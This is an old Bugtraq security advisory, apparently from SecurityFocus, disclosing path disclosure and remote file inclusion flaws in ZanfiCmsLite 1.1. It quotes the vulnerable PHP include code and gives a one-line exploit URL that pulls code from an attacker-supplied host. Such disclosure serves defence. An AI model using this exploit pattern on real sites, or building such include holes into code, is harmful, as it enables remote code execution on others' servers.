Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Multiple vulnerabilities in ZanfiCmsLite
Oct 11 2004 12:59PM
Lin Xiaofeng (Cracklove Gmail Com)
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
http://target/index.php?inc=http://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
http://www.proxysky.com/vulz/show.php?id=3
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
http://target/index.php?inc=http://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
http://www.proxysky.com/vulz/show.php?id=3
[ reply ]